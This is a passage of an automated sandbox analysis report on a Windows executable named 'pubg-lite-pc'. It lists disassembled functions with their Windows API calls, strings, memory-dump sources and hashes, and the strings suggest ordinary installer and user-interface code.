                                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 009963E0
                                                                                                • SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 009963F3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageRectSendWindow$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 425339167-0
                                                                                                • Opcode ID: f677f14f312d04c8046fc59162a44d808eaa25af26f7e7776372ad8faf68972e
                                                                                                • Instruction ID: 782f314e08d278270aee71ff3ace59d760a9066634db11e8ae3ad1c677e1b0fb
                                                                                                • Opcode Fuzzy Hash: f677f14f312d04c8046fc59162a44d808eaa25af26f7e7776372ad8faf68972e
                                                                                                • Instruction Fuzzy Hash: 18514771D00748ABDB21CFA8CD49BDEBBF8EF59710F14431AE815A7291EB706A84CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0097FD70 Relevance: 9.1, APIs: 6, Instructions: 97windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,00000001), ref: 0097FE01
                                                                                                • VerSetConditionMask.KERNEL32(00000000), ref: 0097FE05
                                                                                                • VerSetConditionMask.KERNEL32(00000000), ref: 0097FE09
                                                                                                • VerifyVersionInfoW.KERNEL32(?), ref: 0097FE2E
                                                                                                • GetParent.USER32(?), ref: 0097FE52
                                                                                                • SendMessageW.USER32(?,00000432,00000000,?), ref: 0097FEA8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConditionMask$InfoMessageParentSendVerifyVersion
                                                                                                • String ID:
                                                                                                • API String ID: 2374517313-0
                                                                                                • Opcode ID: 1422dd9d624ace1a03a05e4f3b9231a3dbd374b864a4b421555fcd5eecaf33b9
                                                                                                • Instruction ID: e719aae8bb6a12a8900a7f39bc541c65b5bf0bc14a64bb1b5564aaec1728c3ea
                                                                                                • Opcode Fuzzy Hash: 1422dd9d624ace1a03a05e4f3b9231a3dbd374b864a4b421555fcd5eecaf33b9
                                                                                                • Instruction Fuzzy Hash: C4311BB1A083459FE320CF24DC49B5BBBE8EFC8704F00491EF58897291D7B595488B92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00981240 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 339windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00981431
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 009815F8
                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 0098163B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$AllocateHeap
                                                                                                • String ID: ListView$`Property` = '
                                                                                                • API String ID: 4003639188-2735687366
                                                                                                • Opcode ID: 3f969e015f7422614229fa6a59dfc4c78568c133e93a65eceb386d99bea291e9
                                                                                                • Instruction ID: 228f7eb24496aa39490e696b757e1b39a1359022a67ebb2298fb908211bacd0a
                                                                                                • Opcode Fuzzy Hash: 3f969e015f7422614229fa6a59dfc4c78568c133e93a65eceb386d99bea291e9
                                                                                                • Instruction Fuzzy Hash: D2D16671A00248EFCB14DFA8C884BEEBBF5FF48314F144169E816AB390DB75A945CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00975CB0 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000001A,00000000,00000000), ref: 00975CDB
                                                                                                • SendMessageW.USER32(?,0000001A,00000000,00000000), ref: 00975CE6
                                                                                                • SendMessageW.USER32(000000FF,0000001A,00000000,00000000), ref: 00975D07
                                                                                                • SendMessageW.USER32(00A74F95,0000001A,00000000,00000000), ref: 00975D12
                                                                                                • SendMessageW.USER32(000000FF,00000030,00000000,00000001), ref: 00975D2A
                                                                                                • SendMessageW.USER32(00A74F95,00000030,00000000,00000001), ref: 00975D3C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: d41369935c395cc642af23d37007da300acbd9b3d736ff1bc7f676cb22c9ef6f
                                                                                                • Instruction ID: cb7ed46367052450f25b6b803804e800cde859bcf3da39d6656adbd1ee86c417
                                                                                                • Opcode Fuzzy Hash: d41369935c395cc642af23d37007da300acbd9b3d736ff1bc7f676cb22c9ef6f
                                                                                                • Instruction Fuzzy Hash: 8A21D5317407086FE6216F288C03F5AB7E9FF98B00F110519F6816B1E1DAA0B850CB86
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009C3360 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetShortPathNameW.KERNEL32(F4D3B90A,00000000,00000000), ref: 009C33BF
                                                                                                • GetShortPathNameW.KERNEL32(?,?,00000000), ref: 009C342D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: NamePathShort
                                                                                                • String ID: neutral$x64$x86
                                                                                                • API String ID: 1295925010-1541741584
                                                                                                • Opcode ID: 58e700241ffac873c7f1ccdac04caee8221ad2c63a2677db2b7c1c5b56e82a41
                                                                                                • Instruction ID: ac90c9f91ce40c40f9a356a604b822ab50bd2d96c4d75b2317780346526fb809
                                                                                                • Opcode Fuzzy Hash: 58e700241ffac873c7f1ccdac04caee8221ad2c63a2677db2b7c1c5b56e82a41
                                                                                                • Instruction Fuzzy Hash: 0AA1B271A00248EFDB00DFA8C959FDEBBB9EF94324F10815DE415AB291DB749A44CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B9330 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 260COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000080,00000001,Close,50000001,?,00000128,?,00000032,0000000E,00000082,000001F5,?,50000000,?,00000026), ref: 009B9608
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID: Close$Copy$Details >>$Send Error Report
                                                                                                • API String ID: 4139908857-113472931
                                                                                                • Opcode ID: 3ba67cbed231422ea24031870b255634082fede38884050006e7c97cc0ffc320
                                                                                                • Instruction ID: fdd0f2a5a88a1009c64eeb86d7988465ecdbb99f97c635c4997664a8543d19e0
                                                                                                • Opcode Fuzzy Hash: 3ba67cbed231422ea24031870b255634082fede38884050006e7c97cc0ffc320
                                                                                                • Instruction Fuzzy Hash: FF91AD70A50205ABEB14DF60DD56FEEB7B9BF95B10F104629F611BB2D0EBB0A940CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B7460 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 170libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr), ref: 009B74D4
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009B74DB
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 009B758C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$AddressConditionFileLibraryLoadModuleNameProcVariableWake
                                                                                                • String ID: Dbghelp.dll$SymFromAddr
                                                                                                • API String ID: 3219134937-642441706
                                                                                                • Opcode ID: 0267f03f5779af2ed892025ba7e45cf4da08c8cf6ba8ad568440509916b0bb05
                                                                                                • Instruction ID: ff37ccb01b35e49c88d347bb9c2405ead5b60d6b6a93d761b222d5171f25c4c3
                                                                                                • Opcode Fuzzy Hash: 0267f03f5779af2ed892025ba7e45cf4da08c8cf6ba8ad568440509916b0bb05
                                                                                                • Instruction Fuzzy Hash: 9B71CD70904218DFDB24CF68CD89BEDB7B8AB49310F1086D8E559A72D1DB749B84CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009797F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0097982F
                                                                                                • SendMessageW.USER32(?,00000143,00000000,?), ref: 009799B1
                                                                                                • SendMessageW.USER32(?,00000151,00000000,?), ref: 009799C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: ComboBox$`Property` = '
                                                                                                • API String ID: 3850602802-2900511900
                                                                                                • Opcode ID: b5fd3f1f5ba83c2a93737f246f0e55d54c1aa66c87136bb86621de8fbf99bded
                                                                                                • Instruction ID: 2fed27ee59c22a550b73a0826f16090b707e5c1cc8104df167c626d0c6352a61
                                                                                                • Opcode Fuzzy Hash: b5fd3f1f5ba83c2a93737f246f0e55d54c1aa66c87136bb86621de8fbf99bded
                                                                                                • Instruction Fuzzy Hash: 43615C71A00258DFDF04DFA8C885BDEBBF5FF48314F148169E915AB295DB70AA06CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0095CBE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143threadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0095CC78
                                                                                                • MulDiv.KERNEL32(00000010,00000000,00000060), ref: 0095CCCC
                                                                                                • SendMessageW.USER32(?,00000127,00030003,00000000), ref: 0095CCF7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentMessageSendThread
                                                                                                • String ID: AI_HIDE_CAPTION_ICON_AND_TEXT$+t
                                                                                                • API String ID: 710090838-2104823175
                                                                                                • Opcode ID: d9087df3cb04f3f6d0166b5eeefced824c47aa36b731d3cd64f8dfb50dbf737f
                                                                                                • Instruction ID: d40a776f79ac117490b871048d172e4bfcfe598f5cb57662edd7b1b5a0e60ab4
                                                                                                • Opcode Fuzzy Hash: d9087df3cb04f3f6d0166b5eeefced824c47aa36b731d3cd64f8dfb50dbf737f
                                                                                                • Instruction Fuzzy Hash: 6051B171A04244DFDF05EF64C895BADBBB5AF85300F0444ADE946AF296CB70AE08CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00960C6C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 140windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000000FF), ref: 00960CD6
                                                                                                • SendMessageW.USER32(00000001,00000418,00000000,0000012C), ref: 00960DD2
                                                                                                • SendMessageW.USER32(?,00000432,00000000,0000002C), ref: 00960DE9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Item
                                                                                                • String ID: ,$4
                                                                                                • API String ID: 3888421826-508195717
                                                                                                • Opcode ID: a80f9007136135a9fb656148c88131fcf9767decdc53ba3f9b26b127c3d647be
                                                                                                • Instruction ID: 5375db54839e7306f4569e10e06c298dfe6bd4e48d988ed370e88f6cc801b406
                                                                                                • Opcode Fuzzy Hash: a80f9007136135a9fb656148c88131fcf9767decdc53ba3f9b26b127c3d647be
                                                                                                • Instruction Fuzzy Hash: 3C513970D00729CFDB25CF64C985B99BBB4FF59324F108299E959A7292DB31AE84CF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009A1120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96registrylibraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(Advapi32.dll,F4D3B90A,?,?,?,?,?,Function_001484E0,000000FF), ref: 009A1163
                                                                                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 009A118C
                                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,Function_001484E0,000000FF), ref: 009A11EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                                • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                • API String ID: 4190037839-2994018265
                                                                                                • Opcode ID: 20dda714246a61291271b30750d3d4b89ff2aa669bc7875e30874ca40bea0c77
                                                                                                • Instruction ID: 8b47a2287f29dc1fca9b22f1c8f39b73924638ba1d9c22fa543f481083a672d2
                                                                                                • Opcode Fuzzy Hash: 20dda714246a61291271b30750d3d4b89ff2aa669bc7875e30874ca40bea0c77
                                                                                                • Instruction Fuzzy Hash: 1931A072744209BFEB24CF45DC45FA6BBACFB09750F10852AFA15D7280EB75A810CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009D5300 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: APPDATA$AppDataFolder$PROGRAMFILES$ProgramFilesFolder
                                                                                                • API String ID: 0-3551742416
                                                                                                • Opcode ID: d0820898a19db9a39dd3e277cb6377bf8b730ffe33795e32db08decc777b5bf3
                                                                                                • Instruction ID: 8e741a24fe0b64c0beffe9f0629de79a2c87f115690f4827d46c9f5b36edbbad
                                                                                                • Opcode Fuzzy Hash: d0820898a19db9a39dd3e277cb6377bf8b730ffe33795e32db08decc777b5bf3
                                                                                                • Instruction Fuzzy Hash: 5E21F332B40A09ABCB25DF68D844AFAB3E9FB65760F51466BE421D7391EB31DD40C740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00996450 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74libraryloaderwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(SetWindowTheme), ref: 0099651D
                                                                                                • SendMessageW.USER32(000000EF,00001036,00010000,00010000), ref: 0099655F
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                  • Part of subcall function 009749D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00974A11
                                                                                                  • Part of subcall function 00A45A17: EnterCriticalSection.KERNEL32(00B0282C,?,?,00929407,00B0345C,00A9C710), ref: 00A45A21
                                                                                                  • Part of subcall function 00A45A17: LeaveCriticalSection.KERNEL32(00B0282C,?,00929407,00B0345C,00A9C710), ref: 00A45A54
                                                                                                  • Part of subcall function 00A45A17: RtlWakeAllConditionVariable.NTDLL ref: 00A45ACB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$AddressConditionDirectoryMessageProcSendSystemVariableWake
                                                                                                • String ID: SetWindowTheme$UxTheme.dll$explorer
                                                                                                • API String ID: 1566958886-3123591815
                                                                                                • Opcode ID: 1fc1fc1d9da9c74ced3d59e73825fdccba1bf87f5ef4c996b801f80a3dc389f7
                                                                                                • Instruction ID: e3bed9691de0dd68886990dce8a7b679c51e689a22082ae71abb5cff27817aeb
                                                                                                • Opcode Fuzzy Hash: 1fc1fc1d9da9c74ced3d59e73825fdccba1bf87f5ef4c996b801f80a3dc389f7
                                                                                                • Instruction Fuzzy Hash: FA2171F1A40601EBCB20DF68ED49F997BE8FB50B20F104725F620A72E1DB71AE10CA51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

